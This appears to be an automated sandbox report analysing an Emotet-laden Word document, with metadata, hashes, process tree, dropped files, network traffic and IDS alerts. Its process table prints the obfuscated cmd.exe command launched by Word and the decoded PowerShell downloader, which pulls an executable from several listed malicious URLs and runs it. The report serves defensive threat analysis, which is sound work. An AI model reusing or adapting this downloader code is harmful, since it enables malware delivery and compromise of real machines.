File name: | Untitled-ALX-L554955.doc |
Full analysis: | https://app.any.run/tasks/6484a87b-46b6-47b2-89ae-3a560cc4660b |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 08:05:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Cooper, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 05:31:00 2018, Last Saved Time/Date: Wed Nov 14 05:31:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 7D24DB05104C6C2B3CEDAA14DCE6DBA5 |
SHA1: | 7B31BF78A1C38413449D658E61C7A90A1783240F |
SHA256: | 77339DE74BB03979053CE0ADA65C9C4EB37A720304EEB581B99D92835F21B7B3 |
SSDEEP: | 1536:qjkqGO5ocn1kp59gxBK85fBt+a9Ky4z4He519y9ZjFz4AZUEJ:P41k/W48ez4He519y9ZjFz4AZUc |
Extension | File type |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Title: | - |
Subject: | - |
Author: | Cooper |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:14 05:31:00 |
ModifyDate: | 2018:11:14 05:31:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3128 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Untitled-ALX-L554955.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2648 | cmd /V^:ON/C"^s^e^t c^E=^X0^u/[^Z^5nR^fd^H^9^k.'NC^i^MPv^G^}^x(^b^ ^-\+^$p^B^6)^e^T^@Jl^mwSA^]^j;q,ctoV^2L^1^{g^Or^I^h^8^E^=z^Wsa:^y&&^for %^a ^in (^3^2^,52,^42,36,^60^,68,6^2^,^36,^4^0^,^4^0^,2^7,^3^1^,48,^1^8^,7,^6^5^,^15,39^,1^1^,6^2,^15^,^4^7^,31^,^18^,^8^,^0^,6^5^,1^5,62,51^,^5^1,3^2,^7^0,3^,^3^,6^8^,51,2,^10,^5^6,^1,1,^14,26^,^18,66^,3,7,^37^,^0,6^8,^2^2,^3^6^,^6^3^,^5^3,^1^1,^3^8^,^6^2,^5^1,5^1^,^3^2,^7^0,3,^3,^52^,7^,40^,18,^7,36,^36,^60,36^,^58,18^,^6^8,^51,60,^6^9^,^5^1,^18^,^5^2^,7,14^,5^0,^52^,4^1,3,6^4^,^2^2^,46^,58,^5^5^,^5^1^,^2^1^,38^,6^2,^5^1^,51,32^,7^0,^3,3,^4^1,6^9,^60,^5^0,5^2,^5^0^,6^9^,^68,6^9,^7,52,^1^4^,1^8,51^,^3^,51,0^,^1^8^,5^2^,^34^,^13,4^3,4^6^,^38,6^2,5^1,5^1,^32,^70,^3^,3,51,^6^0,^6^9,7,68^,^4^0^,^69,4^1,^3^2,^2^,7^,^58^,1^4^,^50^,5^2^,^41^,3^,36^,5^4,4^0,^39,^8,^48,0^,5^9^,19,38,^6^2^,51^,5^1,^3^2^,^70^,^3^,^3,^4^1,2,1^0,6^9^,^7^,66,^6^9,^6^8,7^1^,^68^,3^6,^6^0,^21,^1^8^,5^0^,18^,^52^,6^8^,69,7^1,^69,40,^69^,^14^,50^,52,4^1,^3,^12^,^2^1^,44^,^3^2^,^37,^1^3,^10,1^8,50^,6^,^1^5^,14^,^4^3^,^32^,40,18,^5^1^,^2^5,^1^5^,^38,1^5^,3^5,47^,31^,^48,^67^,^60,6^5,^25^,4^,^43,71,^68^,^5^1,3^6^,^41^,^14^,6^1^,^5^9,1^4^,^20^,^69^,^5^1^,^62,^4^5,^70^,70^,^22,^36^,^51,3^7^,36^,^41,^3^2,20^,^6^9^,^5^1^,6^2^,2^5,^3^5^,3^0^,^1^5^,2^9,^39^,5^,7,^1^4^,^3^6^,2^4,36,^1^5^,3^5,4^7,^31,^5^0,50^,8^,2^7,6^5^,1^6^,3^6^,42^,2^8^,^5^9,2^6,46,^36,^5^0^,^51^,^27^,2^8,5^0,5^2^,^4^1^,^27,^1^5^,^4^1,68,2^4,^4^1^,40,^54,14^,24,41^,^40,^6^2,51,51,^32,^1^5^,4^7,3^1,32,^1^7^,^37^,2^7,65^,^27,^1^6^,36^,^4^2^,^28,5^9,^26^,46,^36^,5^0,^51,^27^,^28,^50,^52,41,2^7,^15^,^6^9,^1^0^,^52^,1^0,26^,^1^4,68,51,^60^,^3^6,6^9^,^4^1,15^,^47^,^9^,^5^2,^6^0^,^36^,^69^,50^,^6^2^,25^,3^1^,^26,3^2,67^,2^7,^1^8,^7,2^7,31^,^18^,8^,^0^,3^5^,57^,^5^1^,^60,71^,^57^,31,^5^0^,^50^,8,1^4^,^5^2^,3^2,3^6,7,^2^5,^15^,^2^2,64,3^7,1^5,49,^3^1,26^,^32,^67^,^49^,1^,35^,^4^7^,^31,50^,50^,8,^14,68,36^,7,1^0,2^5^,^35,47,3^1^,32,^1^7^,^37^,^1^4,^52,3^2,^3^6,7,^25,^35,^47,31^,3^2^,17,3^7^,14^,^5^1,^71^,^3
^2,^36,^27^,6^5,^27^,^56,47,^3^1^,^3^2,^1^7,^37,^1^4^,4^2^,60,^1^8,^51^,^36^,^25,3^1,^50,^5^0,8^,14,60^,36,^6^8,32,52^,7^,6^8^,^3^6^,3^3^,^52^,^10^,^71,35,4^7^,31^,^32^,1^7,^3^7^,14,6^8^,^6^9^,^2^1,^36^,51^,5^2,^9^,1^8,^4^0^,^36,^2^5,^31,48,67,^60^,3^5^,^4^7^,4^3^,51^,69^,^60^,5^1,^28,2^0^,60,52^,^5^0,36,68^,^6^8^,^27^,3^1^,^4^8,6^7^,6^0^,4^7^,26^,6^0^,36^,69^,13,^23,5^0,6^9,^5^1,^50^,^6^2,5^7^,^23,2^3,27^,^2^7^,^27,^2^7,^27,27^,2^7^,^2^7,27^,^27^,2^7^,^2^7^,^27,2^7^,^2^7^,^2^7^,^27,7^6)d^o ^s^e^t ^3w^p=!^3w^p!!c^E:~%^a,1!&&^if %^a ^g^e^q 7^6 c^a^l^l %^3w^p:~^-53^6%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
456 | powershell $qin='JHh';$iRX='http://stud100.biz/nTXsGe8VH@http://onlineeregistration.com/EGjgLtv@http://marcocasano.it/tXio6kSj@http://translampung.com/e2lJRqXOM@http://mudanzasyserviciosayala.com/9vApTkdic5'.Split('@');$qWr=([System.IO.Path]::GetTempPath()+'\JZn.exe');$ccR =New-Object -com 'msxml2.xmlhttp';$pCT = New-Object -com 'adodb.stream';foreach($bpW in $iRX){try{$ccR.open('GET',$bpW,0);$ccR.send();$pCT.open();$pCT.type = 1;$pCT.write($ccR.responseBody);$pCT.savetofile($qWr);Start-Process $qWr;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2784 | "C:\Users\admin\AppData\Local\Temp\JZn.exe" | C:\Users\admin\AppData\Local\Temp\JZn.exe | — | powershell.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
3232 | "C:\Users\admin\AppData\Local\Temp\JZn.exe" | C:\Users\admin\AppData\Local\Temp\JZn.exe | — | JZn.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
2860 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | JZn.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
3812 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe |
User: admin Company: Micro Integrity Level: MEDIUM Version: 6.1.7600.1 | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
3128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7E4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
456 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LEV1RF3CK4J37XG2MUG7.temp | — | |
MD5:— | SHA256:— | |||
3128 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:256A3EF47ED32A3D3038855D49DF0319 | SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0 | |||
456 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db60d.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3232 | JZn.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:83993DA32B060C07475CFED5AB9B03AA | SHA256:951F1946669138459A5185EA594D13FA358486CF05DAAB305D4174C1A1CF0579 | |||
456 | powershell.exe | C:\Users\admin\AppData\Local\Temp\JZn.exe | executable | |
MD5:83993DA32B060C07475CFED5AB9B03AA | SHA256:951F1946669138459A5185EA594D13FA358486CF05DAAB305D4174C1A1CF0579 | |||
3128 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$titled-ALX-L554955.doc | pgc | |
MD5:D6E7E98109B06CB493D6D249055BBDA1 | SHA256:F42C6494F1F4B4BEE66B03459FFC46FFD13168EC3611AB0DB9ED8414EF245028 | |||
456 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3812 | lpiograd.exe | GET | — | 187.163.174.149:8080 | http://187.163.174.149:8080/ | MX | — | — | malicious |
456 | powershell.exe | GET | 200 | 45.252.248.22:80 | http://stud100.biz/nTXsGe8VH/ | VN | executable | 448 Kb | malicious |
456 | powershell.exe | GET | 301 | 45.252.248.22:80 | http://stud100.biz/nTXsGe8VH | VN | html | 617 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3812 | lpiograd.exe | 187.163.174.149:8080 | — | Axtel, S.A.B. de C.V. | MX | malicious |
456 | powershell.exe | 45.252.248.22:80 | stud100.biz | AZDIGI Corporation | VN | suspicious |
Domain | IP | Reputation |
---|---|---|
stud100.biz | | malicious |
PID | Process | Class | Message |
---|---|---|---|
456 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
456 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
456 | powershell.exe | A Network Trojan was detected | ET TROJAN VBScript Redirect Style Exe File Download |
456 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
456 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |